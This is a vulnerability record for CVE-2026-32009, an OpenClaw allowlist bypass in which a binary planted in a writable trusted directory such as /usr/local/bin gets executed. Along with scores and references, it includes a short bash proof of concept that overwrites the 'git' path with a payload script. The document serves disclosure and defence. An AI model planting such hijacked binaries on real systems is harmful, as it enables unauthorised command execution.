Security Vulnerability Report
CVE-2026-32009 CVSS 5.7 MEDIUM

Published: 2026-03-19 22:16:34
Last Modified: 2026-03-23 18:33:04

Description

OpenClaw versions prior to 2026.2.24 contain a policy bypass vulnerability in the safeBins allowlist evaluation that trusts static default directories including writable package-manager paths like /opt/homebrew/bin and /usr/local/bin. An attacker with write access to these trusted directories can place a malicious binary with the same name as an allowed executable to achieve arbitrary command execution within the OpenClaw runtime context.

CVSS Details

CVSS Score
5.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.2.24

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# PoC for CVE-2026-32009: OpenClaw Binary Hijacking
# Assumption: Attacker has write access to /usr/local/bin
# Target: Hijacking a common binary like 'git' which OpenClaw might trust.
TARGET_BINARY="git"
TRUSTED_DIR="/usr/local/bin"
MALICIOUS_PAYLOAD="/tmp/evil_payload.sh"

# 1. Create a malicious payload (e.g., reverse shell or command execution)
echo "#!/bin/bash" > "$MALICIOUS_PAYLOAD"
echo "echo 'CVE-2026-32009 Exploit Executed'" >> "$MALICIOUS_PAYLOAD"
echo "whoami" >> "$MALICIOUS_PAYLOAD"
chmod +x "$MALICIOUS_PAYLOAD"

# 2. Copy the malicious payload to the trusted directory with the target name
# This assumes the target binary does not already exist or is not strictly
# path-resolved against specific hashes
cp "$MALICIOUS_PAYLOAD" "$TRUSTED_DIR/$TARGET_BINARY"

# 3. Wait for or trigger OpenClaw to execute the trusted binary
# OpenClaw checks /usr/local/bin/git -> matches safeBins -> executes malicious payload
echo "Malicious binary placed at $TRUSTED_DIR/$TARGET_BINARY"
echo "Trigger OpenClaw execution to observe the bypass."

References

Patch: https://github.com/openclaw/openclaw/commit/b67e600bff696ff2ed9b470826590c0ce6b3bb0a
Vendor Advisory: https://github.com/openclaw/openclaw/security/advisories/GHSA-5gj7-jf77-q2q2
Third Party Advisory: https://www.vulncheck.com/advisories/openclaw-binary-hijacking-via-static-default-trusted-directories-in-safebins

Weakness

CWE-426 (Untrusted Search Path), Primary

Additional Metrics (from the NVD record)

The score shown in the header is the Secondary (CNA-supplied) CVSS 3.1 score; the record also carries a CVSS 4.0 score and a Primary CVSS 3.1 score, which rates the issue higher.

CVSS 4.0 (Secondary): 7.0 HIGH
CVSS:4.0/AV:L/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector: LOCAL, Attack Complexity: HIGH, Attack Requirements: PRESENT, Privileges Required: HIGH, User Interaction: NONE
Vulnerable system impact: Confidentiality HIGH, Integrity HIGH, Availability NONE; Subsequent system impact: NONE

CVSS 3.1 (Secondary): 5.7 MEDIUM
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:H/A:H
Exploitability Score: 0.5, Impact Score: 5.2

CVSS 3.1 (Primary): 7.8 HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploitability Score: 1.8, Impact Score: 5.9

Record Status

Analyzed